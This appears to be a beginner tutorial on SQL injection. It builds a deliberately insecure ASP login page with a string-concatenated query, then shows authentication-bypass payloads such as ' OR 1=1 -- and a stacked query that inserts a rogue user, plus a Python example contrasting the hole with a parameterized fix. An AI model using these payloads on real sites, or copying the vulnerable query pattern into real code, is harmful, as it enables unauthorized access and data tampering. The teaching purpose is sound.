SQL Hacking → SQL Injection for dummies…
Introduction
The purpose of this article is to help people without advanced computer knowledge to start white-hat hacking and to learn how to write more secure login web pages. When I started to learn about security, even though I searched really hard, I did not manage to find articles that would tell me from scratch what to do in order to learn how SQL query injection works.
In fact, for some strange reason, almost nobody actually explains exactly what an SQL query injection is and how you can exploit a database using one. So, based on these thoughts, I decided to write this article, explaining in great detail how to create your own testing environment and perform SQL query injections (using your own machine, well, not exactly).
The prerequisites for successfully repeating the experiment are:
1. VMWare Workstation 6.x (you do not have to use a vm machine but I recommend it).
2. Knowledge of ASP (create DSN-less Database Connection and handling html form data).
3. ASP Studio 2005 (you can download that at http://en.ewebxp.com/).
4. IIS 5.1 (Internet Information Services).
5. MSDE 2000 Release A (Microsoft SQL Server Desktop Engine 2000).
6. MDAC 2.x (Microsoft Data Access Components).
7. Know how to write html (mostly forms).
8. Internet browser (either Internet Explorer or Firefox will do).
IIS Installation & Configuration
In order to install IIS 5.1 you need the Windows XP CD; then go:
Start->Control Panel->Add or Remove Programs->Add/Remove Windows Components->IIS5.1
To configure IIS 5.1 you have to create your own testing web site; go:
Start->Control Panel->Administrative Tools->IIS->Default Site(right click)->New->Virtual Directory
Then for Alias give a name that represents your needs, and define the directory where your ASP page is located. Then right-click on the icon of your testing web site, choose Properties and set them just as you see in the image below (this is not a secure IIS configuration).

Configuration1: Configuring Virtual Directory properties.
Configuration2: Configuring Directory Security.
MS SQL Server Installation & Configuration
Download the setup executable from the Internet, install the database, start it running and then go:
Start ->Run ->cmd (this will start command prompt)
Then type osql -U sa (sa is the system administrator account) and give the password (the default is blank!).
And then type again from command prompt:
1> CREATE TABLE users (userName varchar (10) , password varchar (10))
2> go
1> INSERT INTO users(userName,password) VALUES ('value1','value2')
2> go
This creates the table in the database named master; you can make sure of it by doing:
1> use master
2> go
Now you have a database named master and a table called users with two columns named userName and password. If you want to learn more about SQL queries you can use www.sqlzoo.net to run your queries.
Building up the system
The system we are going to use is described below by the image.
Example1: Testing environment used to perform the experiment.
When you actually perform an SQL injection, what you do is try to manipulate the SQL query in order to either gain access to a web site or download a database. Generally speaking, there are two sub-attacks: the login page attack and the database download attack (or drop attack). In the first attack we want to create a query that bypasses the authentication mechanism, forcing the database to return a positive reply (I will explain later what that positive reply is!). In the second attack we use the first query to build a second, more sophisticated query: a drop query (if we want to cause a DoS attack) or one that downloads the database (to make use of the data).
Why does a database return errors? Well, it is simple: your SQL query is forwarded from your web application directly into your database (at least most of the time) through your HTML login form. What I mean is described by the image below.
Example2: What is actually forwarded to the database.
If the user input that goes directly into the database is malicious, then the database is going to reply with an error page returning valuable information about what went wrong with the SQL query (e.g. a data type mismatch, etc.).
How to write insecure login pages
Since we have explained what is forwarded directly from my Internet browser to my database, we can start talking about how an insecure login page is written. The HTML form used for the exploitable code looks something like this.
Code examples1: Html form code.
The ASP (Active Server Pages) code is placed right above the HTML form, and because the ASP page is executed from top to bottom, the ASP code will always execute first and the HTML will be rendered right afterwards. Every time my browser submits data, the login page is executed. The code displayed below implements a poor authentication mechanism: it takes the user input from the HTML form (meaning userName and password) and feeds it straight into the SQL query.
Code examples2: Authentication code.
First I define the variables that will hold the username and the password. Then I define the very famous database connection string. The query string is then built by concatenating the raw form values into the SQL text:
sql = "SELECT userName,passwords FROM users WHERE userName='" & myuserName & _
      "' AND passwords='" & mypassword & "'"
Code examples3: Creating the SQL query string.
The following code creates a Recordset object, an ADO object (ADO stands for ActiveX Data Objects). A Recordset object is used to hold a set of records from a database table. A Recordset object consists of records and columns (fields). In ADO, this object is the most important one and the one used most often to manipulate data from a database [1].
Set rs=Server.CreateObject("ADODB.recordset")
Code examples4: Creating an ADO object.
When you first open a Recordset, the current record pointer points to the first record and the EOF property is set to False. If there are no records, the EOF property is True. The EOF property returns True (-1) if the current record position is after the last record in the Recordset, otherwise it returns False (0) [1].
In the if statement we check the Recordset to see if it is empty. If the Recordset is empty, the EOF property returns True, so I reverse that value by putting a Not operator in front of it. So if the Recordset is empty, Not EOF evaluates to False and the server prints back the word Wrong (meaning that the database did not return a positive reply); otherwise it prints back the word Correct (meaning that the database did return a positive reply). By saying that the database returns a positive reply I mean a non-empty Recordset! The mistake here is that I practically let the database validate my web user, without using a proper authentication mechanism.
The SQL injection attack
The only thing left to do is to exploit the code I wrote above by finding a way to log in without knowing the user name or the password. Because I wrote the code, I know that my web page is vulnerable to SQL query injection, I know which database engine is used, and I know the name of the table containing the user names and passwords.
The SQL query forwarded to the database is:
SELECT userName,passwords FROM users WHERE userName='User Input' AND passwords='User Input'
Because I know that the database engine I am using is MS SQL Server Desktop Engine 2000, I know that comments are written with a double minus, like --. So I want an SQL query that is going to return an ADO Recordset object with its EOF property set to False (meaning a non-empty ADO Recordset) without knowing any user name or password!
Step 1: The malicious SQL query forwarded to the database is:
SELECT userName,passwords
FROM users
WHERE userName='User Input' OR 1=1 --
AND passwords='User Input'
Step 2: Which translates into:
SELECT userName,passwords
FROM users
WHERE userName='' OR 1=1
Step 3: Which is equivalent to:
SELECT userName,passwords
FROM users
WHERE userName='' OR 1=1
Code examples5: How SQL queries are translated by the database engine.
By commenting out the part of the SQL query that contains the AND section and adding an OR operator, we managed to create an SQL query that returns a non-empty ADO Recordset, because the statement 1=1 is always true, even with an empty user name. The single quote characters tell the SQL interpreter that the data entered by the user is a varchar(10); the single quote is meaningful only to the SQL engine. If the database scans the table from top to bottom, the malicious attacker is going to be logged in as the first user it finds, meaning the session id is going to belong to the first user written into the database!
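As an added example (not the article's ASP code), the string concatenation from Code examples 3 and the page's Not rs.EOF check are rebuilt in Python against an in-memory SQLite table, next to a parameterized query that closes the hole; the sample users and the table layout are constructed here, with the column named passwords to match the queries shown above. SQLite accepts the same -- comment as MSDE, so the ' OR 1=1 -- input from Step 1 behaves the same way.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    # Constructed sample data mirroring the article's users table (assumption).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (userName varchar(10), passwords varchar(10))")
    con.executemany("INSERT INTO users (userName, passwords) VALUES (?, ?)",
                    [("alice", "s3cret"), ("bob", "hunter2")])
    con.commit()
    return con

def build_vulnerable_sql(user: str, pw: str) -> str:
    # Same concatenation as the ASP page: the raw form values become SQL text,
    # so a quote or a -- in the input changes the meaning of the statement.
    return ("SELECT userName,passwords FROM users WHERE userName='" + user
            + "' AND passwords='" + pw + "'")

def vulnerable_login(con: sqlite3.Connection, user: str, pw: str):
    # Mirrors the page's logic: any non-empty Recordset counts as "Correct",
    # and the first row returned decides whose session the caller gets.
    rows = con.execute(build_vulnerable_sql(user, pw)).fetchall()
    return rows[0][0] if rows else None

def safe_login(con: sqlite3.Connection, user: str, pw: str):
    # Parameterized query: the driver passes the values separately from the
    # SQL text, so quotes and comment markers are matched as plain data.
    rows = con.execute(
        "SELECT userName FROM users WHERE userName=? AND passwords=?", (user, pw)
    ).fetchall()
    return rows[0][0] if rows else None

if __name__ == "__main__":
    con = make_db()
    payload = "' OR 1=1 --"  # the input from Step 1 of the article
    print(build_vulnerable_sql(payload, "x"))
    print("vulnerable:", vulnerable_login(con, payload, "x"))  # alice
    print("parameterized:", safe_login(con, payload, "x"))     # None
```

The vulnerable path logs the caller in as alice, the first row in the table, exactly as the paragraph above predicts; the parameterized path finds no user whose name is literally ' OR 1=1 -- and rejects the login.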
Exploiting the SQL injection
To be clear: in order to perform a successful login you have to find the proper SQL query pattern. In the above example I found that the web application is vulnerable to ' OR 1=1 --, or, more generally, to:
' OR <mathematical expression that is always true> --
Code examples6: How SQL queries are translated by the database engine.
Based on the above, we can assume that more than one SQL query can be found having the same effect as the one we used, such as:
SELECT userName,passwords
FROM users
WHERE userName='' OR 'a'='a' --
SELECT userName,passwords
FROM users
WHERE userName='' OR 2=2 --
SELECT userName,passwords
FROM users
WHERE userName='' OR 0=0 --
Code examples7: Equivalent SQL queries.
Knowing that, we can see that all the queries listed above are going to allow us to log in. But besides a successful login, what else can we do? Well, the possibilities are limitless, because only our imagination can restrict us. Important notice: this attack won't work on MS Access because it does not support double-dash comments; instead you can use the NULL character to cut off the query, using the special characters %00 [2].
Now that we have found an SQL query pattern to which my web application is vulnerable, we can alter it and start trying to compromise the database integrity by inserting one more user name and password. How? Simply type both queries, one after the other, into the user name text box of the HTML login form!
The SQL query pattern we are going to use is:
Use this SQL pattern (enter it as one line, without a line break):
' OR 1=1 INSERT INTO users (userName, passwords) VALUES ('hackedyou','hackpass') --
Which is forwarded from the web application to the database as:
SELECT userName,passwords
FROM users
WHERE userName='' OR 1=1
INSERT INTO users (userName, passwords) VALUES ('hackedyou','hackpass')
Code examples8: Exploiting the login page.
Reference [1]: http://www.w3schools.com/ado/ado_ref_recordset.asp
Reference [2]: http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html